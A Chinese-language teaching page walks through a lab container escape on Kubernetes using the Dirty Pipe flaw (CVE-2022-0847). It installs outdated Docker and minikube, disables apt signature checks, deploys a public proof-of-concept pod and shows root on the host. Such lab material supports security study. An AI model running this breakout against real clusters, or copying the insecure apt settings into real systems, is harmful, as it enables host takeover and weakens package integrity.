司徒的教學網站

K8s >> Container Escape

CVE-2022-0847
參考資訊：
1. docker
2. kubernetes-1
3. kubernetes-2
4. dirtypipe-container-breakout

如下：
$ cd
$ wget https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/containerd.io_1.2.0-1_amd64.deb
$ wget https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/docker-ce-cli_18.09.0~3-0~debian-buster_amd64.deb
$ wget https://download.docker.com/linux/debian/dists/buster/pool/stable/amd64/docker-ce_18.09.0~3-0~debian-buster_amd64.deb
$ sudo dpkg -i containerd.io_1.2.0-1_amd64.deb
$ sudo dpkg -i docker-ce-cli_18.09.0~3-0~debian-buster_amd64.deb
$ sudo dpkg -i docker-ce_18.09.0~3-0~debian-buster_amd64.deb

$ sudo apt-get update
$ sudo apt-get install -y apt-transport-https

$ curl -Lo minikube https://storage.googleapis.com/minikube/releases/v0.25.0/minikube-linux-amd64
$ chmod +x minikube
$ sudo mv minikube /usr/local/bin/

$ sudo apt-get update --allow-unauthenticated --allow-insecure-repositories
$ sudo apt-get install -y apt-transport-https ca-certificates curl
$ curl -fsSL https://packages.cloud.google.com/apt/doc/apt-key.gpg | gpg --dearmor | sudo tee /etc/apt/trusted.gpg.d/kubernetes-archive-keyring.gpg > /dev/null
$ echo "deb [arch=amd64 trusted=yes allow-insecure=yes allow-weak=yes allow-downgrade-to-insecure=yes check-valid-until=no] https://packages.cloud.google.com/ kubernetes-xenial main" | sudo tee /etc/apt/sources.list.d/kubernetes.list
$ sudo apt-get update
$ sudo apt-get install -y kubelet kubeadm kubectl
$ sudo apt-mark hold kubelet kubeadm kubectl

$ wget https://dl.k8s.io/v1.22.7/kubernetes-client-linux-amd64.tar.gz
$ tar xvf kubernetes-client-linux-amd64.tar.gz
$ sudo cp kubernetes/client/bin/* /usr/local/bin/

$ sudo minikube start --vm-driver=none
$ sudo kubectl version
    Client Version: version.Info{Major:"1", Minor:"22", GitVersion:"v1.22.7", GitCommit:"b56e432f2191419647a6a13b9f5867801850f969", GitTreeState:"clean", BuildDate:"2022-02-16T11:50:27Z", GoVersion:"go1.16.14", Compiler:"gc", Platform:"linux/amd64"}

$ cd
$ git clone https://github.com/DataDog/security-labs-pocs
$ cd security-labs-pocs/proof-of-concept-exploits/dirtypipe-container-breakout/
$ sudo kubectl create -f pod.yaml
    pod/compromised-pod created

$ sudo kubectl exec -it compromised-pod -- sh
    No help topic for '/usr/bin/sh'
    command terminated with exit code 3

$ cat /tmp/hacked
    uid=0(root) gid=0(root) groups=0(root)
    ubuntu
返回上一頁